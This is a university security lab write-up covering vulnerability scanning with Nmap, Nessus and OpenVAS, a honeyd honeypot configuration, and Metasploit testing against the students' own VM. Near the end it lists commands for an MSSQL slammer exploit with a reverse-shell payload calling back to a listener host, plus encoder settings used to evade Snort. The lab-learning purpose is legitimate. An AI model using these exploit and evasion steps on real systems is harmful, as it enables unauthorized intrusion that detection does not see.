Vulnerability scanning:
Setup Nmap http://nmap.org/, Nessus http://www.nessus.org/ and OpenVAS http://www.openvas.org/.
Nmap
- apt-get install nmap
- Trying this installed version 4.76, which is from 2008. A newer version was available from the homepage, so we used that one.
- tar -xvf nmap-5.21.tgz
- ./configure
- make
- make install
- NMAP SUCCESSFULLY INSTALLED
- testing on the vm is in the next part
Nessus
- apt-get install nessus nessusd
- nessus-adduser
- /etc/init.d/nessusd start
- Testing this by connecting with the client (nessus) to the server (nessusd) gave some strange errors saying "The daemon shut down the communication".
- We again decided to switch to the version from the homepage and downloaded version 4.2.1, which apparently uses a web front end instead of the old client/server method.
- dpkg -i Nessus-4.2.1-ubuntu910_i386.deb
- register for plugin
- /etc/init.d/nessusd start
- This did not work: the web page would not load. Apparently the plugins had not been downloaded yet. Running the install again, without removing it first, did the trick, and we had to wait 20 minutes for the plugins to finish downloading.
- After this we had a big problem getting Flash 10.0 working in Firefox. We needed to set plugin.expose_full_path to true in the Firefox about:config page to get the full path of the Flash files in the about:plugins page. After this we could remove the Flash files. Then we downloaded the Flash_Player_10_for_Linux_(.tar.gz) and put it in the /usr/lib/mozilla/plugins directory.
- Now we could finally use the web page. See the next section.
OpenVas
- Trying apt-get again gave problems with getting it installed correctly and getting the plugins, so we used the tutorial to install all the necessary source files.
- This took some time, because we needed to ./configure, make and make install all the sources and wait for the plugins to finish downloading and loading onto the server.
- But this did not work: the client seemed to hang when connecting to the server. So we tried another tutorial, this time for the OpenVAS 3.0 version: http://wikisecure.net/security/how-to-install-openvas-ubuntu9.
- I did a clean reinstall of my work machine and tried again.
- This was almost the same as the previous tutorial: a lot of ./configure, make, make install and waiting for the plugins.
- The execution is in the next section.
Scan your VM (see assignment 1) for vulnerabilities using the installed software.
Nmap
- From the source above, we see there are many options to scan a host. We want to scan for open ports and get some extra info. A good choice is to use -sS (to check for open ports in a stealthy way) and -A (to get some extra info like the OS fingerprint and versions of the programs running).
- nmap -sS -A 145.100.105.34
- We ran nmap on the host machine of the VM; this resulted in no open ports, which was very strange. We decided to install nmap on a different machine.
- On the other experimental machine this also did not work. A try on the work machines gave the following result:
Nmap scan report for 145.100.105.34
<code>
Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-12 13:58 CEST
Nmap scan report for 145.100.105.34
Host is up (0.0041s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS webserver 6.0
139/tcp  open  netbios-ssn
1433/tcp open  ms-sql-s      Microsoft SQL Server 2005 9.00.1399; RTM
3389/tcp open  microsoft-rdp Microsoft Terminal Service
Device type: general purpose
Running: Microsoft Windows 2003|XP
OS details: Microsoft Windows Server 2003 SP2, Microsoft Windows XP SP2 or Server 2003 SP2
Service Info: OS: Windows

Host script results:

Nmap done: 1 IP address (1 host up) scanned in 77.89 seconds
</code>
Nessus
- We could enter the web page through https://127.0.0.1:8834/ with the user we added earlier.
- We set a policy and did a scan on the meowth IP range.
- This resulted in the VM (IP ::34) and its router (IP ::33) being scanned.
Nessus scan report part 1 for 145.100.105.34
{{2009-2010:students:vic_ding:nessus_scan1.png|}}
- The VM is IP ::34 and Nessus found 7 high risks. Looking deeper we see
Nessus scan report for 145.100.105.34, a little deeper
{{2009-2010:students:vic_ding:nessus_scan1_2.png|}}
- that Microsoft's SMB and MSSQL are the main risks. You can see more detail in the report nessus_report_scan1.html.
openvas
- Trying the client command from the first tutorial:
- OpenVAS-Client -q 127.0.0.1 9390 taarik 123456 iptoscan.txt scanresults.html -T html (iptoscan.txt contains 145.100.105.34)
- This hung at connection time, with the following line:
Warning: paranoia_level=2 but "trusted_ca" file not found: cacert.pem
- This is why we switched to another OpenVAS version. But when we left it for 5 minutes, we saw it got an extra line:
Info: Found and enabled 16842 new plugins.
- Five minutes after that we got a scan report: scanresults.html
- This report shows the same results found with Nessus.
- Apparently OpenVAS is just slow on my machine, because others did not have problems when executing it. So we reinstalled OpenVAS for nothing; we could have used the first version we installed.
Is this action detected by Snort?
- Taking a look at Snort, we saw that Snort had stopped working and would not start again; apparently Snort is not compatible with the rules we downloaded. So we removed everything and installed the latest Snort from source instead of apt-getting it, following this tutorial: http://ubuntuforums.org/showthread.php?t=919472
- The only thing extra needed was:
mkdir /root/snort_dynamicrules_bkp
cd /usr/local/lib/snort_dynamicrules/
cp * /root/snort_dynamicrules_bkp
rm *
- and this file for /etc/init/snort
Nmap
Snort detecting Nmap
{{2009-2010:students:vic_ding:nmap_snort1.png|}}
- Snort detected some specific Nmap scans and some other requests it made.
Nessus
Snort detecting Nessus
{{2009-2010:students:vic_ding:nessus_snort1.png_.png|}}
- Nessus caused over 700 alerts, which shows why nobody goes through them.
Openvas
Snort detecting OpenVAS
{{2009-2010:students:vic_ding:openvas_snort1.jpg|}}
- OpenVAS caused even more alerts, over 900.
Honey pots:
Setup a honey pot of choice (e.g. honeyd) in a VM (new or existing VM, your choice).
- We set up a new Ubuntu 9.04 VM and followed this tutorial to apt-get honeyd.
- apt-get install honeyd honeyd-common
- We need to use farpd to respond to unused IPs in the meowth range 145.100.105.32/27, so we adjusted the /etc/defaults/farpd file to:
# File: /etc/defaults/farpd
# Defaults for farpd initscript
# Network interface where farpd will listen
INTERFACE="eth0"
# Network under control of farpd
NETWORK=145.100.105.32/27
- and now running farpd: /etc/init.d/farpd start
arpd[2970]: listening on eth0: arp and (dst net 145.100.105.32/27) and not ether src 00:16:3e:12:34:af
- Next we need to set the way honeyd will run by adjusting the /etc/defaults/honeyd file to:
# File: /etc/defaults/honeyd
# Defaults for honeyd initscript
# run as a daemon
RUN="yes"
# Network interface where honeyd will listen
INTERFACE="eth0"
# Network under control of honeyd
NETWORK=145.100.105.32/27
# Options (collect to use some statistics)
# -c hostname:port:username:password
OPTIONS="-c localhost:12345:taarik:123456"
- For the statistics we did:
- added taarik:123456 in /etc/honeypot/honeydstats.conf
- honeydstats --os_report /etc/honeypot/os.honeydstats --port_report /etc/honeypot/port.honeydstats --spammer_report /etc/honeypot/spam.honeydstats --country_report /etc/honeypot/country.honeydstats -f /etc/honeypot/honeydstats.conf -l localhost -p 12345
Starting as background process
Configure it to act like a vulnerable system.
- In /etc/honeypot/honeyd.conf we added the following part:
honeyd.conf
<code bash>
create win2k
set win2k personality "Microsoft Windows 2000 SP2"
set win2k default tcp action reset
set win2k default udp action reset
#set win2k default icmp action block
set win2k uptime 3567
set win2k droprate in 13
add win2k tcp port 23 "sh /usr/share/honeyd/scripts/unix/linux/suse8.0/telnetd.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 21 "sh /usr/share/honeyd/scripts/win32/win2k/msftp.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 25 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-smtp.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 80 "sh /usr/share/honeyd/scripts/win32/win2k/iis.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 110 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-pop3.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 143 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-imap.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 389 "sh /usr/share/honeyd/scripts/win32/win2k/ldap.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 5901 "sh /usr/share/honeyd/scripts/win32/win2k/vnc.sh $ipsrc $sport $ipdst $dport"
add win2k udp port 161 "perl /usr/share/honeyd/scripts/unix/general/snmp/fake-snmp.pl public private --config=/usr/share/honeyd/scripts/unix/general/snmp"

# This will redirect incoming windows-filesharing back to the source
add win2k udp port 137 proxy $ipsrc:137
add win2k udp port 138 proxy $ipsrc:138
add win2k udp port 445 proxy $ipsrc:445
add win2k tcp port 137 proxy $ipsrc:137
add win2k tcp port 138 proxy $ipsrc:138
add win2k tcp port 139 proxy $ipsrc:139
add win2k tcp port 445 proxy $ipsrc:445

create win2k3
set win2k3 personality "Microsoft Windows NT 4.0 SP3"
set win2k3 default tcp action reset
set win2k3 default udp action reset
#set win2k3 default icmp action block
set win2k3 uptime 3567
set win2k3 droprate in 13
add win2k3 tcp port 23 "sh /usr/share/honeyd/scripts/unix/linux/suse8.0/telnetd.sh $ipsrc $sport $ipdst $dport"
add win2k3 tcp port 21 "sh /usr/share/honeyd/scripts/win32/win2k/msftp.sh $ipsrc $sport $ipdst $dport"
add win2k3 tcp port 25 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-smtp.sh $ipsrc $sport $ipdst $dport"
add win2k3 tcp port 80 "sh /usr/share/honeyd/scripts/win32/win2k/iis.sh $ipsrc $sport $ipdst $dport"
add win2k3 tcp port 110 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-pop3.sh $ipsrc $sport $ipdst $dport"
add win2k3 tcp port 143 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-imap.sh $ipsrc $sport $ipdst $dport"
add win2k3 udp port 161 "perl /usr/share/honeyd/scripts/unix/general/snmp/fake-snmp.pl public private --config=/usr/share/honeyd/scripts/unix/general/snmp"

bind 145.100.105.36 win2k
bind 145.100.105.37 win2k3
</code>
- and now running honeyd: /etc/init.d/honeyd start
Run at least three services.
- We are running a lot of services, using the scripts available from the honeyd-common package, on two IPs: ::36 and ::37.
- Examples are IIS, telnetd, SNMP, Exchange and some file sharing.
Scan it with Nmap including version detection.
- nmap -sS -sU -A 145.100.105.36
- -sS is for TCP connect
- -sU is for UDP connect
- -A is OS fingerprint and version detection
Nmap scan report for 145.100.105.36
<code>
Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-15 10:09 CEST
Nmap scan report for 145.100.105.36
Host is up (0.0012s latency).
Not shown: 1982 closed ports
PORT      STATE         SERVICE       VERSION
4/tcp     filtered      unknown
21/tcp    open          tcpwrapped
23/tcp    open          tcpwrapped
25/tcp    open          tcpwrapped
80/tcp    open          tcpwrapped
110/tcp   open          tcpwrapped
139/tcp   open          tcpwrapped
143/tcp   open          tcpwrapped
389/tcp   open          tcpwrapped
445/tcp   open          tcpwrapped
5901/tcp  open          tcpwrapped
7911/tcp  filtered      unknown
19315/tcp filtered      unknown
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
161/udp   filtered      snmp
445/udp   open|filtered microsoft-ds
16918/udp filtered      unknown
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.21%D=4/15%OT=21%CT=1%CU=2%PV=N%DS=4%DC=T%G=Y%TM=4BC6CA78%P=i686
OS:-pc-linux-gnu)SEQ(SP=9F%GCD=1%ISR=A7%TI=I%CI=I%II=I%SS=S)SEQ(TI=I%CI=I%I
OS:I=I%SS=S)SEQ(SP=9E%GCD=1%ISR=A3%TI=I%CI=I)SEQ(SP=B4%GCD=1%ISR=B6%TI=RD%C
OS:I=I%II=I)OPS(O1=M5B4NW0NNT11%O2=M5B4NW0NNT11%O3=M5B4NW0NNT11%O4=M5B4NW0N
OS:NT11%O5=M5B4NW0NNT11%O6=M5B4NW0NNT11)OPS(O1=M5B4NW0NNT11%O2=%O3=%O4=%O5=
OS:M5B4NW0NNT11%O6=M5B4NW0NNT11)WIN(W1=402E%W2=402E%W3=402E%W4=402E%W5=402E
OS:%W6=402E)ECN(R=Y%DF=Y%T=40%W=402E%O=M5B4NW0NNT10%CC=N%Q=)T1(R=Y%DF=Y%T=4
OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=402E%S=O%A=S+%F=AS%O=M
OS:5B4NW0NNT11%RD=0%Q=)T4(R=Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%D
OS:F=N%T=40%W=0%S=A%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O
OS:=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%S=A%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80
OS:%IPL=38%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=Y%T=80%CD=Z)

Nmap done: 1 IP address (1 host up) scanned in 171.06 seconds
</code>
- nmap -sS -sU -A 145.100.105.37
Nmap scan report for 145.100.105.37
<code>
Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-15 10:15 CEST
WARNING: RST from 145.100.105.37 port 21 -- is this port really open?
Nmap scan report for 145.100.105.37
Host is up (0.0012s latency).
Not shown: 1990 closed ports
PORT      STATE    SERVICE          VERSION
21/tcp    open     tcpwrapped
23/tcp    open     tcpwrapped
25/tcp    open     tcpwrapped
80/tcp    open     tcpwrapped
110/tcp   open     tcpwrapped
143/tcp   open     tcpwrapped
389/tcp   open     tcpwrapped
10000/tcp filtered snet-sensor-mgmt
161/udp   filtered snmp
781/udp   filtered hp-collector
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.21%D=4/15%OT=21%CT=1%CU=2%PV=N%DS=4%DC=T%G=Y%TM=4BC6CB84%P=i686
OS:-pc-linux-gnu)SEQ(SP=40%GCD=1%ISR=47%TI=BI%CI=BI%TS=U)SEQ(SP=42%GCD=1%IS
OS:R=4A%TI=BI%CI=BI%II=BI%SS=S%TS=U)SEQ(SP=46%GCD=1%ISR=48%TI=BI%CI=BI%TS=U
OS:)SEQ(SP=57%GCD=1%ISR=59%TI=RD%CI=BI%II=BI%TS=U)SEQ(SP=42%GCD=1%ISR=4A%TI
OS:=BI%CI=BI%TS=U)OPS(O1=M5B4%O2=M5B4%O3=M5B4%O4=M5B4%O5=M5B4%O6=M5B4)OPS(O
OS:1=%O2=M5B4%O3=M5B4%O4=M5B4%O5=M5B4%O6=M5B4)WIN(W1=2017%W2=2017%W3=2017%W
OS:4=2017%W5=2017%W6=2017)ECN(R=Y%DF=Y%T=40%W=2017%O=M5B4%CC=N%Q=)T1(R=Y%DF
OS:=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T1(R=Y%DF=N%T=40%S=O%A=O%F=AR%RD=0%Q=)T2(R
OS:=Y%DF=N%T=40%W=0%S=A%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=40%W=2017%S=O%A=S
OS:+%F=AS%O=M5B4%RD=0%Q=)T4(R=Y%DF=N%T=40%W=0%S=A%A=S+%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=N%T=40%W=0%S=A%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=40%W=0%S=A%A=S+%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%S=A%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=80%IPL=38%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=Y%T=80%CD=
OS:Z)

Nmap done: 1 IP address (1 host up) scanned in 71.49 seconds
</code>
- The -A option should do the same as -O (OS fingerprint) and -v (version detection), but for some reason it returns tcpwrapped.
- Redoing the nmap scan with -O instead of -A, we get a better reply:
Nmap scan report for 145.100.105.36 with -O instead of -A
<code>
Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-15 10:47 CEST
Nmap scan report for 145.100.105.36
Host is up (0.0012s latency).
Not shown: 1983 closed ports
PORT      STATE         SERVICE
21/tcp    open          ftp
23/tcp    open          telnet
25/tcp    open          smtp
80/tcp    open          http
110/tcp   open          pop3
139/tcp   open          netbios-ssn
143/tcp   open          imap
389/tcp   open          ldap
445/tcp   open          microsoft-ds
5901/tcp  open          vnc-1
19801/tcp filtered      unknown
137/udp   filtered      netbios-ns
138/udp   open|filtered netbios-dgm
161/udp   open|filtered snmp
445/udp   open|filtered microsoft-ds
17814/udp filtered      unknown
35702/udp filtered      unknown
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.21%D=4/15%OT=21%CT=1%CU=2%PV=N%DS=2%DC=I%G=Y%TM=4BC6D2BB%P=i686
OS:-pc-linux-gnu)SEQ(SP=A1%GCD=1%ISR=A4%TI=I%CI=RD)SEQ(TI=I%CI=RD)SEQ(SP=A0
OS:%GCD=1%ISR=A4%TI=I%CI=RD)SEQ(SP=AC%GCD=1%ISR=AD%TI=I%CI=I%TS=1)SEQ(SP=9E
OS:%GCD=1%ISR=A3%TI=I%CI=RD)OPS(O1=M5B4NW0NNT11%O2=M5B4NW0NNT11%O3=M5B4NW0N
OS:NT11%O4=M5B4NW0NNT11%O5=M5B4NW0NNT11%O6=M5B4NW0NNT11)OPS(O1=M5B4NW0NNT11
OS:%O2=M5B4NW0NNT11%O3=M5B4NW0NNT11%O4=%O5=M5B4NW0NNT11%O6=M5B4NW0NNT11)WIN
OS:(W1=402E%W2=402E%W3=402E%W4=402E%W5=402E%W6=402E)ECN(R=Y%DF=Y%T=40%W=402
OS:E%O=M5B4NW0NNT10%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T1(R=Y%D
OS:F=N%T=40%S=O%A=O%F=AR%RD=0%Q=)T1(R=Y%DF=Y%T=40%S=O%A=O%F=AS%RD=0%Q=)T2(R
OS:=N)T3(R=Y%DF=Y%T=40%W=402E%S=O%A=S+%F=AS%O=M5B4NW0NNT11%RD=0%Q=)T4(R=Y%D
OS:F=N%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=A%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W
OS:=0%S=A%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=38%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=N)

Nmap done: 1 IP address (1 host up) scanned in 50.19 seconds
</code>
Does nmap think that it's a real device?
- nmap does not recognize the OS fingerprint. This is probably because we are using honeyd 1.5c and its nmap fingerprints may be too old. Looking in the nmap.prints file, you see that not every type of every OS is in there. Nmap recognized Microsoft Windows Server 2003 SP2 in the test at the beginning of this page, for instance, but it is not in the file.
- But if the fingerprint were recognised, you would not think something is wrong.
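To check how closely a honeyd host matches what its honeyd.conf promises, here is an added example (not part of the original page and not honeyd's or nmap's own code) that parses the add/bind lines of a honeyd.conf and the port table of nmap's normal output, then reports configured ports nmap did not see open, open ports the config does not define, and ports that came back as tcpwrapped. The config and scan excerpts below are constructed, trimmed from the win2k template and the ::36 report above.

```python
import re

# Constructed honeyd.conf excerpt (same syntax as the page's config).
HONEYD_CONF = """\
create win2k
set win2k personality "Microsoft Windows 2000 SP2"
add win2k tcp port 21 "sh /usr/share/honeyd/scripts/win32/win2k/msftp.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 80 "sh /usr/share/honeyd/scripts/win32/win2k/iis.sh $ipsrc $sport $ipdst $dport"
add win2k udp port 161 "perl fake-snmp.pl public private"
# redirect windows filesharing back to the source
add win2k tcp port 139 proxy $ipsrc:139
bind 145.100.105.36 win2k
"""

# Constructed nmap normal-output excerpt (port table only).
NMAP_OUT = """\
Nmap scan report for 145.100.105.36
PORT     STATE         SERVICE
21/tcp   open          tcpwrapped
23/tcp   open          tcpwrapped
80/tcp   open          tcpwrapped
139/tcp  open          tcpwrapped
161/udp  filtered      snmp
"""

ADD_RE = re.compile(r'^add\s+(\S+)\s+(tcp|udp)\s+port\s+(\d+)\s+(.*)$')
BIND_RE = re.compile(r'^bind\s+(\S+)\s+(\S+)$')
PORT_RE = re.compile(r'^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)')

def parse_honeyd(conf):
    """Return {ip: {(port, proto): handler}} from add/bind lines; create/set lines are skipped."""
    templates, bound = {}, {}
    for line in conf.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        m = ADD_RE.match(line)
        if m:
            tmpl, proto, port, handler = m.groups()
            templates.setdefault(tmpl, {})[(int(port), proto)] = handler.strip('"')
            continue
        m = BIND_RE.match(line)
        if m:
            ip, tmpl = m.groups()
            bound[ip] = templates.get(tmpl, {})
    return bound

def parse_nmap(text):
    """Return {ip: {(port, proto): (state, service)}} from nmap normal output."""
    hosts, cur = {}, None
    for line in text.splitlines():
        if line.startswith('Nmap scan report for '):
            cur = line.split()[-1]
            hosts[cur] = {}
        elif cur and (m := PORT_RE.match(line)):
            port, proto, state, service = m.groups()
            hosts[cur][(int(port), proto)] = (state, service)
    return hosts

def compare(conf, nmap_text):
    """Per bound honeypot IP: configured ports not seen open ('open' or 'open|filtered'),
    open ports the config never defined, and open ports reported as tcpwrapped."""
    report = {}
    seen = parse_nmap(nmap_text)
    for ip, ports in parse_honeyd(conf).items():
        observed = seen.get(ip, {})
        open_ports = {k for k, (st, _) in observed.items() if st.startswith('open')}
        report[ip] = {'missing': sorted(set(ports) - open_ports),
                      'unexpected': sorted(open_ports - set(ports)),
                      'tcpwrapped': sorted(k for k, (_, svc) in observed.items() if svc == 'tcpwrapped')}
    return report
```

On the constructed input this flags 161/udp as configured but only seen as filtered, and 23/tcp as open without a matching add line, which is the kind of mismatch worth fixing before an attacker notices it.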
Scan it with Nessus and OpenVAS.
- The Nessus scan report is here: nessus_honeyd.html
- The OpenVAS scan report is here: openvas_honeyd.html
Do Nessus and OpenVAS think that it's a real device?
- Nessus just lists all the open ports of the honeypots; when looking into the open ports we see the tcpwrapped thing again. Nessus explained that it is probably some kind of protection. Apart from that, when looking at OS Identification, we see Nessus did not list one for the honeypots.
- OpenVAS does the same as Nessus. It also states "Unable to detect remote OS. No match found." for "ICMP based OS fingerprint results", which makes you suspicious, but does not give you any idea why this happens.
Vulnerability testing:
Install Metasploit http://www.metasploit.com/framework/
- chmod +x framework-3.*-linux-x86_64.run
- sudo ./framework-3.*-linux-x86_64.run
- Say yes to everything in the installer
- Launch the Metasploit console by running 'msfconsole'
Try to exploit the weaknesses that are found with Nessus and OpenVAS.
- Nessus found the following weaknesses that were severe
- and which were found to be exploitable with Metasploit, when searching for the "weakness description MS number" in the msfconsole
- We could not find them for these.
- These exploits are done the same way as the next exploit, where you just change the exploit, so we will only explain that one.
Launch a well known UDP based MSSQL attack against your VM.
It doesn't matter whether MSSQL is installed or not.
- use exploit/windows/mssql/ms02_039_slammer
- set payload windows/shell/reverse_tcp
- payload ⇒ windows/shell/reverse_tcp
- msf exploit(ms02_039_slammer) > set rhost 145.100.105.34
- rhost ⇒ 145.100.105.34
- msf exploit(ms02_039_slammer) > set lhost 145.100.102.143
- lhost ⇒ 145.100.102.143
- msf exploit(ms02_039_slammer) > exploit
<code>
[*] Started reverse handler on 145.100.102.143:4444
[*] Sending UDP packet with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Exploit completed, but no session was created.
</code>
- Something happened and it apparently completed.
Is this action detected by Snort?
Try different encoders using Metasploit evasion options / msfencode.
From the following presentation, Context-keyed-Payload-Encoding.pdf, we concluded that we needed some extra commands after the standard set options we already did in order to evade Snort. These are:
set ENCODER x86/shikata_ga_nai
set EnableContextEncoding 1
Running the previous exploit again with these extra options fooled Snort.
What is Snort telling you?
Nothing, because of the extra options.